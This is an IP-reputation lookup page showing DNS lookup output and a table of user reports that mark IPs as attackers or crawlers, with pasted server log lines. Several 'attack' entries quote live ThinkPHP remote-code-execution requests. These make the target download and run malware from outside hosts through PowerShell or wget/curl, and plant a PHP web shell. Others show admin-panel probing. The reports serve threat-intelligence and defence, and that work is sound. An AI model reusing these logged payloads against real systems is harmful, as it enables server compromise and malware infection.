城市(city): unknown
省份(region): unknown
国家(country): United States
运营商(isp): unknown
主机名(hostname): unknown
机构(organization): unknown
使用类型(Usage Type): unknown
b; <<>> DiG 9.10.3-P4-Ubuntu <<>> 104.22.40.77
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 20941
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;104.22.40.77. IN A
;; AUTHORITY SECTION:
. 418 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2022022500 1800 900 604800 86400
;; Query time: 15 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Fri Feb 25 20:00:41 CST 2022
;; MSG SIZE rcvd: 105Host 77.40.22.104.in-addr.arpa. not found: 3(NXDOMAIN)Server: 183.60.83.19
Address: 183.60.83.19#53
** server can't find 77.40.22.104.in-addr.arpa: NXDOMAIN| IP | 类型 | 评论内容 | 时间 |
|---|---|---|---|
| 58.251.121.184 | attack | 58.251.121.184 - - [01/Apr/2019:15:40:52 +0800] "GET /super.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 58.251.121.186 - - [01/Apr/2019:15:40:52 +0800] "GET /ww.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" |
2019-04-01 15:41:42 |
| 118.25.49.95 | attack | 118.25.49.95 - - [02/Apr/2019:20:00:02 +0800] "GET /public/index.php?s=index/think\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/lodhbrsdjsbwixa27329.exe');start%20C:/Windows/temp/lodhbrsdjsbwixa27329.exe HTTP/1.1" 400 682 "http://118.25.52.138:443/public/index.php?s=index/think\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/lodhbrsdjsbwixa27329.exe');start C:/Windows/temp/lodhbrsdjsbwixa27329.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
118.25.49.95 - - [02/Apr/2019:20:00:02 +0800] "GET /public/index.php?s=/index/\\x5Cthink\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^>hydra.php HTTP/1.1" 400 682 "http://118.25.52.138:443/public/index.php?s=/index/\\x5Cthink\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^>hydra.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
118.25.49.95 - - [02/Apr/2019:20:00:02 +0800] "GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/lodhbrsdjsbwixa27329.exe');start%20C:/Windows/temp/lodhbrsdjsbwixa27329.exe HTTP/1.1" 400 682 "http://118.25.52.138:443/public/hydra.php?xcmd=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/lodhbrsdjsbwixa27329.exe');start C:/Windows/temp/lodhbrsdjsbwixa27329.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" |
2019-04-02 20:03:22 |
| 14.17.21.58 | attack | 14.17.21.58 - - [06/Apr/2019:14:35:29 +0800] "GET /tools/phpMyAdmin/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 14.17.3.64 - - [06/Apr/2019:14:35:29 +0800] "GET /wpo.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" |
2019-04-06 14:38:25 |
| 66.102.6.14 | bots | 也是谷歌爬虫不是真实流量 66.102.6.14 - - [29/Mar/2019:08:22:44 +0800] "GET / HTTP/1.1" 200 3237 "http://www.google.com/search" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview) Chrome/41.0.2272.118 Safari/537.36" |
2019-03-29 09:19:24 |
| 80.82.77.33 | bots | 80.82.77.33 - - [05/Apr/2019:13:44:18 +0800] "GET / HTTP/1.1" 200 10269 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" 80.82.77.33 - - [05/Apr/2019:13:44:24 +0800] "" 400 0 "-" "-" 80.82.77.33 - - [05/Apr/2019:13:44:32 +0800] "" 400 0 "-" "-" 80.82.77.33 - - [05/Apr/2019:13:44:32 +0800] "" 400 0 "-" "-" 80.82.77.33 - - [05/Apr/2019:13:44:35 +0800] "" 400 0 "-" "-" 80.82.77.33 - - [05/Apr/2019:13:44:38 +0800] "quit" 400 182 "-" "-" 80.82.77.33 - - [05/Apr/2019:13:44:41 +0800] "GET /robots.txt HTTP/1.1" 200 292 "-" "-" 80.82.77.33 - - [05/Apr/2019:13:44:45 +0800] "GET /.well-known/security.txt HTTP/1.1" 404 232 "-" "-" 80.82.77.33 - - [05/Apr/2019:13:44:45 +0800] "GET /sitemap.xml HTTP/1.1" 200 1425241 "-" "-" 80.82.77.33 - - [05/Apr/2019:13:44:46 +0800] "GET /favicon.ico HTTP/1.1" 200 4286 "-" "python-requests/2.13.0" 80.82.77.33 - - [05/Apr/2019:13:44:47 +0800] "" 400 0 "-" "-" |
2019-04-05 13:47:49 |
| 42.236.10.153 | bots | 360爬虫,偶尔被GA认为是人类正常访问 |
2019-03-28 20:21:34 |
| 178.154.244.50 | bots | yandexbot 178.154.244.50 - - [03/Apr/2019:08:12:31 +0800] "GET /index.php/author/admin/page/3113/ HTTP/1.1" 200 21832 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" 178.154.244.50 - - [03/Apr/2019:08:12:33 +0800] "GET /index.php/page/982/ HTTP/1.1" 200 17713 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" |
2019-04-03 08:16:17 |
| 81.82.28.58 | attack | 81.82.28.58 - - [05/Apr/2019:18:19:25 +0800] "GET /mysql/admin/index.php?lang=en HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36" 81.82.28.58 - - [05/Apr/2019:18:19:26 +0800] "GET /mysql/dbadmin/index.php?lang=en HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36" 81.82.28.58 - - [05/Apr/2019:18:19:28 +0800] "GET /mysql/sqlmanager/index.php?lang=en HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36" 81.82.28.58 - - [05/Apr/2019:18:19:32 +0800] "GET /mysql/mysqlmanager/index.php?lang=en HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36" |
2019-04-05 18:22:15 |
| 23.100.232.233 | bots | 应该是微软爬虫,不是真实流量 23.100.232.233 - - [02/Apr/2019:12:54:13 +0800] "GET /index.php/2018/12/05/didi_2018_12_05_cn/ HTTP/1.1" 200 13104 "http://www.bing.com/search?q=https%3A%2F%2Fz.didi.cn%2FroB7WDCz5iTXn&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; Trident/5.0)" 23.100.232.233 - - [02/Apr/2019:12:54:14 +0800] "GET /wp-content/themes/twentyfifteen/js/html5.js HTTP/1.1" 200 1695 "https://www.eznewstoday.com/index.php/2018/12/05/didi_2018_12_05_cn/" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; Trident/5.0)" |
2019-04-02 13:02:17 |
| 58.251.121.185 | attack | 58.251.121.185 - - [06/Apr/2019:14:36:24 +0800] "GET /avast.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 58.251.121.184 - - [06/Apr/2019:14:36:25 +0800] "GET /myadmin2/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 58.251.121.185 - - [06/Apr/2019:14:36:25 +0800] "GET /avast.php HTTP/1.1" 404 209 "http://118.25.52.138/avast.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 58.251.121.184 - - [06/Apr/2019:14:36:25 +0800] "GET /myadmin2/index.php HTTP/1.1" 404 209 "http://118.25.52.138/myadmin2/index.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" |
2019-04-06 14:38:07 |
| 203.208.60.67 | bots | 谷歌爬虫为啥访问不存在的php页面。。 203.208.60.67 - - [06/Apr/2019:07:15:51 +0800] "GET /qw.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/ 41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 203.208.60.49 - - [06/Apr/2019:07:15:52 +0800] "GET /qw.php HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/ 41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 203.208.60.55 - - [06/Apr/2019:07:15:58 +0800] "GET /56.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/ 41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 203.208.60.110 - - [06/Apr/2019:07:15:59 +0800] "GET /56.php HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome /41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 203.208.60.38 - - [06/Apr/2019:07:16:10 +0800] "GET /ljb.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome /41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" |
2019-04-06 07:36:32 |
| 111.206.198.27 | bots | 111.206.198.27 - - [29/Mar/2019:00:20:15 +0800] "GET /wp-content/plugins/wp-quicklatex/js/wp-quicklatex-frontend.js?ver=1.0 HTTP/1.1" 200 4303 "http://www.eznewstoday.com/" "Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)" Baidu render爬虫,爬一些静态文件 |
2019-03-29 09:07:10 |
| 180.97.35.15 | bots | 据说是百度网讯的节点,反正最近爬的挺频繁的 180.97.35.59 180.97.35.4 180.97.35.5 等 |
2019-04-06 07:11:18 |
| 123.190.154.164 | attack | 123.190.154.164 - - [02/Apr/2019:09:32:58 +0800] "GET /otn/login/checkUser HTTP/1.1" 404 232 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" |
2019-04-02 09:44:02 |
| 138.197.77.207 | attack | 138.197.77.207 - - [01/Apr/2019:06:39:02 +0800] "GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://159.65.65.37/leet.x86;cat%20leet.x86%20%3E%20xdsf;chmod%20777%20xdsf;./xdsf%20thinkphp HTTP/1.1" 301 194 "-" "python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-696.30.1.el6.x86_64" 138.197.77.207 - - [01/Apr/2019:06:39:04 +0800] "GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://159.65.65.37/leet.x86;cat%20leet.x86%20%3E%20xdsf;chmod%20777%20xdsf;./xdsf%20thinkphp HTTP/1.1" 404 209 "-" "python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-696.30.1.el6.x86_64" 138.197.77.207 - - [01/Apr/2019:06:39:04 +0800] "GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;curl%20-O%20http://159.65.65.37/leet.x86;cat%20leet.x86%20%3E%20xdsf;chmod%20777%20xdsf;./xdsf%20thinkphp HTTP/1.1" 301 194 "-" "python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-696.30.1.el6.x86_64" |
2019-04-01 06:59:47 |